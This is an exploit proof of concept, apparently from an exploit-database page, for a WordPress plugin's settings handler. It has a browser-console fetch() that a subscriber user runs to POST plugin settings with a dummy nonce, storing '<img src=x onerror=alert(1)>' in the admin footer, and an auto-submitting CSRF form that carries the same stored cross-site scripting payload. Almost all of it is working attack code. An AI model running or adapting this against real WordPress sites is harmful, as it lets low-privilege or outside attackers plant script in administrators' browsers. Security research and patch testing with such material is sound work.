Share
## https://sploitus.com/exploit?id=WPEX-ID:46996537-A874-4B2E-9CD7-7D0832F9704D
Run the below command in the developer console of the web browser while being on the blog as a subscriber user

await fetch("/wp-admin/", {
    "credentials": "include",
    "body": "wpbiz-nonce=aaa&tabid=total-hacks-admin&wfb_favicon=&wfb_admin_favicon=&wfb_apple_icon=&wfb_remove_xmlrpc=&wfb_hide_version=&wfb_remove_more=&wfb_remove_excerpt=&wfb_disallow_pingback=&wfb_google_analytics=wwwww&wfb_google=ttttt&wfb_bing=&wfb_revision=&wfb_selfping=&wfb_pageexcerpt=&wfb_createpagefordraft=&wfb_custom_logo=&wfb_admin_footer_text=<img src=x onerror=alert(1)>&wfb_login_logo=&wfb_login_url=&wfb_login_title=&wfb_shortcode=&wfb_oembed=&wfb_webmaster=&wfb_sendername=&wfb_emailaddress=&wfb_update_notification=&submit=%C3%84nderungen+speichern",
    "method": "POST",
    "mode": "cors"
});


<form id="test" action="https://example.com/wp-admin/" method="post">
  <input type="text" name="wpbiz-nonce" value="aaa">
  <input type="text" name="tabid" value="total-hacks-admin">
  <input type="text" name="wfb_favicon" value="">
  <input type="text" name="wfb_admin_favicon" value="">
  <input type="text" name="wfb_apple_icon" value="">
  <input type="text" name="wfb_remove_xmlrpc" value="">
  <input type="text" name="wfb_hide_version" value="">
  <input type="text" name="wfb_remove_more" value="">
  <input type="text" name="wfb_remove_excerpt" value="">
  <input type="text" name="wfb_disallow_pingback" value="">
  <input type="text" name="wfb_google_analytics" value="wwwww">
  <input type="text" name="wfb_google" value="ttttt">
  <input type="text" name="wfb_bing" value="">
  <input type="text" name="wfb_revision" value="">
  <input type="text" name="wfb_selfping" value="">
  <input type="text" name="wfb_pageexcerpt" value="">
  <input type="text" name="wfb_createpagefordraft" value="">
  <input type="text" name="wfb_custom_logo" value="">
  <input type="text" name="wfb_admin_footer_text" value="<img src=x onerror=alert(1)>">
  <input type="text" name="wfb_login_logo" value="">
  <input type="text" name="wfb_login_url" value="">
  <input type="text" name="wfb_login_title" value="">
  <input type="text" name="wfb_shortcode" value="">
  <input type="text" name="wfb_oembed" value="">
  <input type="text" name="wfb_webmaster" value="">
  <input type="text" name="wfb_sendername" value="">
  <input type="text" name="wfb_emailaddress" value="">
  <input type="text" name="wfb_update_notification" value="">
</form>
<script>
    document.getElementById("test").submit();
</script>